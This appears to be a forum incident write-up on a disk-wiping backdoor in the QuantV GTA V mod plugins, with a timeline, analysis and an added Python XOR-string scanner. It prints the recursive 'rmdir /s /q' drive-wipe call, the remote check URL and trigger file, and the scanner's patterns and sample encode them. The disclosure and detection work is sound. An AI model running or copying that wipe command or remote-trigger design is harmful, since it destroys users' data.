This topic contains a timeline and rough summary on the findings regarding the ‘QuantV’ disk wiping incident.
QuantV is a third-party ‘graphics mod pack’ for GTA V, being sold on Patreon by its creator (‘Quant’). It bundles a few plugin DLLs to set shader parameters for the ENBSeries shader patching library, and help with making screenshots.
- 2022-09-03T11:48:00Z: I was informed that there was some lore being spread regarding ‘a trojan virus with drive exterminator’ in the native DLLs bundled with QuantV.
- 2022-09-03T11:52:00Z: A buyer sent a copy of a legitimately purchased version of QuantV to me for analysis.
- 2022-09-03T12:07:00Z: Analysis started on QuantV.asi, with a file time of 2022-09-01T12:06:34Z, a PE timestamp of 2022-08-29T21:34:35Z, and a SHA256 hash of
- 2022-09-03T12:14:00Z: Code that contained a list of drive letters and called system() on some obfuscated (XOR’d) string was discovered. Investigation continued.
- 2022-09-03T12:51:00Z: A tweet informing about this was posted. As the lore was already being spread, this was considered a responsible course of action.
- 2022-09-03T19:30:00Z: More investigation was performed, enbhelper.dll was confirmed as malicious as well, and it appears that a non-functional internet connection will ‘nullify’ the HTTP check at least. The plugin also seems to use/store a flag in some .ini file, and a file x64\data\errorcodes\romanian.txt in the game directory is used as a trigger flag.
- 2022-09-04T17:13:00Z: A newer build has been released (with file times of September 4, 2022, and a PE timestamp a few days newer) which does not include the malicious code in QuantV.asi, though it is still included in enbhelper.dll. Regrettably, the author denies having been involved in this, instead going with FUD explanations, which looks like a cover-up operation. Notably, however, both versions very much look built from the same source code, and the server checks using the same XOR string library are still in.
- QuantV.asi has the HTTP code to fetch status, but enbhelper.dll will apply a pending ‘disk wipe’ as well.
- QuantV.asi contains the full disk wipe/HTTP check logic. This wasn’t found initially as compiler settings were different.
- It’s unlikely that this was added by a ‘leaker’ as some rumors say. The way this is integrated into the code shows that this was likely done by someone with access to either original or reverse-engineered source code for the .asi file, and the chain I’ve received the sample from corroborates this.
- Antivirus software generally does not pick this up as they rely on a) known signatures or b) behavioral analysis. Since this is a plugin, preemptive behavioral analysis does not apply.
- There is no sign of this version of the .asi executing any other commands than this.
- Similarly, there’s no sign of other persistence methods, though there are some file read/writes, and it may be the case the .asi will edit some .ini files in the enbseries folder to ‘worm’ in case a pirated copy is spread further.
- The ‘check’ is done using an HTTP API, ~~the details of which have not been investigated at this time~~ located at http://quantv.xyz/updater, presumably with a POST request of code=..., involving the Desaturate Radius= value in enbseries/enbeffect.fx.ini, which is actually a unique user ID.
- The library cpp-httplib is used, with enb::. The main ‘trigger’ is this API returning (or not returning)
- The command executed amounts to system(("rmdir /s /q " + drive_letter).c_str());. This will remove every file the user has read/write access to, which could be a lot.
- There have been reports of this being used in the wild, and this existing in pirated copies of an ‘August release’ as well.
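A defender-side check that follows from the findings above (the XOR’d command string passed to system(), the ‘rmdir /s /q’ command, and the romanian.txt trigger file), written here as an added example and not code from this write-up or from QuantV: it brute-forces single-byte XOR keys over a file image and reports where the wipe command or the check host decodes. The single-byte key length is an assumption, and the sample bytes are constructed.

```python
import os
import re

# Indicators taken from the write-up: the wipe command and the HTTP check host.
# Assumption: the obfuscation is a single-byte XOR (the key length is not stated).
PATTERNS = [rb"rmdir /s /q", rb"quantv\.xyz"]


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of `data` with the single-byte `key`."""
    return bytes(b ^ key for b in data)


def find_xor_strings(blob: bytes, patterns=PATTERNS):
    """Try all 256 single-byte XOR keys and report pattern hits in the decoded image.

    Returns a list of (key, offset, matched_text); key 0 means the string was in plaintext.
    """
    hits = []
    for key in range(256):
        decoded = xor_bytes(blob, key)
        for pat in patterns:
            for m in re.finditer(pat, decoded):
                hits.append((key, m.start(), m.group().decode("ascii")))
    return hits


def scan_file(path: str):
    """Scan a plugin file (e.g. QuantV.asi or enbhelper.dll) on disk."""
    with open(path, "rb") as f:
        return find_xor_strings(f.read())


def trigger_flag_present(game_dir: str) -> bool:
    """True if the trigger file named in the write-up exists under the game directory."""
    return os.path.isfile(os.path.join(game_dir, "x64", "data", "errorcodes", "romanian.txt"))


# Constructed sample (not a real QuantV binary): the command XOR'd with 0x5A and the
# host XOR'd with 0x31, surrounded by filler bytes.
SAMPLE = (
    b"\x00" * 16
    + xor_bytes(b"rmdir /s /q C:\\", 0x5A)
    + b"MZ filler text "
    + xor_bytes(b"http://quantv.xyz/updater", 0x31)
    + b"\xff" * 8
)

if __name__ == "__main__":
    for key, off, text in find_xor_strings(SAMPLE):
        print(f"key=0x{key:02x} offset={off} text={text!r}")
```

Run scan_file() against the plugin files from a purchased copy; any hit with a non-zero key points at an obfuscated copy of the indicator worth a closer look.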